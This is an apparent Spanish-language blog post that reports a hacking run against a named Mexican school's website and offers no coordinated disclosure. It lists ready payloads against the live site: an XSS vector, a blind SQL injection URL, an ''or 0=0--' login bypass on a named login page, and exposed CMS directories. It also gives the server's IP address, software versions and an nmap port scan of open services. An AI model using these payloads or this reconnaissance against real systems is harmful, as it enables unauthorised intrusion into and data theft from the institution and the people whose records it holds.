empecemos por cross site scripting:
Vector: <ScRiPt >prompt(930295)</ScRiPt>
Iss directory enumeration
http://conalepsin.edu.mx/cms/
muestra los nombres de todos los planteles
Pagina de configuracion
hubiera sido bueno si mostrara las configuraciones, parece ser que es cuando creas una pagina con frontpage :P
http://conalepsin.edu.mx/_vti_inf.html
Un CSRF que no sirve mas que para buscar xD
http://conalepsin.edu.mx/cms/content.asp?company=0&proc=search&procid=hi
Permite diferentes metodos en las cabeceras
OPTIONS, TRACE, GET, HEAD
se salvo de un method put xD
Ohhh pero que es esto? alguien ya estuvo aqui :O
http://conalepsin.edu.mx/cms/database/
http://conalepsin.edu.mx/cms/upload/
http://conalepsin.edu.mx/cms/images/
http://conalepsin.edu.mx/cms/scripts/
http://conalepsin.edu.mx/cms/editor/
muestrame los robots :D
http://conalepsin.edu.mx/robots.txt
y por ultimo tenemos una bonita bsqli
http://conalepsin.edu.mx/cms/content.asp?company=0&proc=news&procid=1' or '38'='39
encontre un par de tablas y columnas nada importantes xD
Bypass Login
http://conalepsin.edu.mx/apps/chekt/Default.aspx
'or 0=0--
Informacion sobre el servidor:
Microsoft-IIS/6.0
Windows
[ASP.NET]
IP: 201.134.74.35
Base de datos:MSAccess
contiene archivos: asp,swf,js,txt
Footprinting:
PORT STATE SERVICE VERSION
21/tcp open ftp
25/tcp filtered smtp
53/tcp open domain Mikrotik RouterOS named or OpenDNS Updater
80/tcp open http Microsoft IIS httpd 6.0
110/tcp open pop3 Merak Mail server pop3d 8.0.3
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.766; SP3a
1723/tcp open pptp?
2000/tcp open bandwidth-test Mikrotik bandwidth-test server
3128/tcp filtered squid-http
3389/tcp open ms-wbt-server Microsoft Terminal Service
5190/tcp filtered aol
8291/tcp open unknown
9999/tcp open abyss?
No hay comentarios:
Publicar un comentario